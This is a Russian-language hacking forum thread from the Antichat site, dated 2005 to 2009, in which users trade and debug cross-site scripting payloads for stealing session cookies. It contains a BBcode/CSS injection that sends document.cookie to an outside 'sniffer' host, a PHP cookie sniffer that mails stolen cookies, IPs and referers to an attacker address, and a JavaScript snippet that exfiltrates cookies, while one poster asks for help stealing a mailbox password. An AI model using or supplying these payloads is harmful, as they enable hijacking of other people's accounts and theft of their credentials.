Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

31.12.2005, 10:21
|
|
Постоянный
Регистрация: 22.01.2005
Сообщений: 764
Провел на форуме: 1086047
Репутация:
67
|
|
Сообщение от coco
А можно ли вставить это
Код HTML:
http://s.netsec.ru//s.gif?id=561
в
Код HTML:
[email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
получишь
Код HTML:
[email]gh0st@gh0st[url=http://gh0st.gov`=`][/url].gov[/email] ` style=`background:url(javascript:document.images[1].src="http://s.netsec.ru/your_login/pic.gif?"+document.cookie);`
регай себе PS - personal sniffer и там свой логин (your_login) указывай, впрочем там тебе твой линк на картинку дадут...
на всякий лучай скажу, что бага не везде работает, так что не думай, что щас все должно ломаться...
Последний раз редактировалось .::Gh0st::.; 31.12.2005 в 10:25..
|
|
|

14.01.2006, 16:22
|
|
Новичок
Регистрация: 29.12.2005
Сообщений: 11
Провел на форуме: 25965
Репутация:
3
|
|
.::Gh0st::.
зафигачила скрипт в инет (хост поддерживает пхп)
отправила ссылку на сайт на мыло. пришел только id текущей сессии, но это мне врядли поможет... ибо мне нужно узнать пароль от ящика, но который отправляется письмо. с остальными снифами та же трабла, шлет IP, ID, еще какую то хрень, но пасс не шлет. я вообщето, даже и на хэш пасса согласна  , дешифровщиком тьма..
добавь пожалуйста в свой скрипт фунцию тырения пароля ))
---------------------
+ наставлю, не вапрос! 
|
|
|

15.01.2006, 22:17
|
|
Постоянный
Регистрация: 22.01.2005
Сообщений: 764
Провел на форуме: 1086047
Репутация:
67
|
|
суть в том, что нужно не просто ссылку заслать, а выполнить javascript в контексте уязвимого сайта и послать куки на свой скрипт. просто зайти поссылке - результата не даст.
|
|
|

15.01.2006, 22:34
|
|
Постоянный
Регистрация: 08.08.2005
Сообщений: 782
Провел на форуме: 6573706
Репутация:
1419
|
|
А чё за она?
Покажи что написанно.
|
|
|

08.10.2009, 16:23
|
|
Новичок
Регистрация: 02.10.2009
Сообщений: 10
Провел на форуме: 83128
Репутация:
0
|
|
привет можете обьяснить не получаеться кое что
<?
$mymail = 'potter234@mail.ru';
$date = date('d.m.y - H:i:s');
$ip = UrlDecode(getenv('REMOTE_ADDR'));
$referer = UrlDecode(getenv('HTTP_REFERER'));
$query = UrlDecode(getenv('QUERY_STRING'));
$cookie=getenv('HTTP_COOKIE');
mail("$mymail", "Kyka npuIIIJIa", " Date and Time: $date\n IP: $ip\n Adress: $referer\n Query String: $query\n Cookie: $cookie");
?>
это скрипт
я пишу два скрипта
index.php
<script>document.location.href="уязвимост ь=%22%3E%3Cscript%20src=http://vkontaktes.h16.ru/js.js%3E%3C/script%3E"</script>
js.js
img=new Image(); img.src="http://vkontaktes.h16.ru/1.php"+document.cookie;
1.php- это для прихода куков на мыло
куки не идут на мыло и приходит токо айпи
|
|
|

08.10.2009, 16:26
|
|
Познающий
Регистрация: 16.09.2009
Сообщений: 86
Провел на форуме: 362547
Репутация:
93
|
|
кто скажет или снимет видео как на сайт установить сниффер?
|
|
|

08.10.2009, 16:33
|
|
Новичок
Регистрация: 02.10.2009
Сообщений: 10
Провел на форуме: 83128
Репутация:
0
|
|
ты для начала исходники хорошие найди
|
|
|

08.10.2009, 16:39
|
|
Новичок
Регистрация: 02.10.2009
Сообщений: 10
Провел на форуме: 83128
Репутация:
0
|
|
а то исходников много а есть и не рабочие!!!
|
|
|

10.10.2009, 13:04
|
|
Участник форума
Регистрация: 29.05.2008
Сообщений: 181
Провел на форуме: 979048
Репутация:
101
|
|
а то исходников много а есть и |̳̿н̳̿е̳̿ ̳̿р̳̿а̳̿б̳̿о̳̿ч̳̿и̳̿е̳̿|!!!
например как твои исходники. ты сейвишь куки своего сайта а надо из query стринг так что убирай ваще то что $cookie=getenv('HTTP_COOKIE'); и тд. а вообще... за археологию банят
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|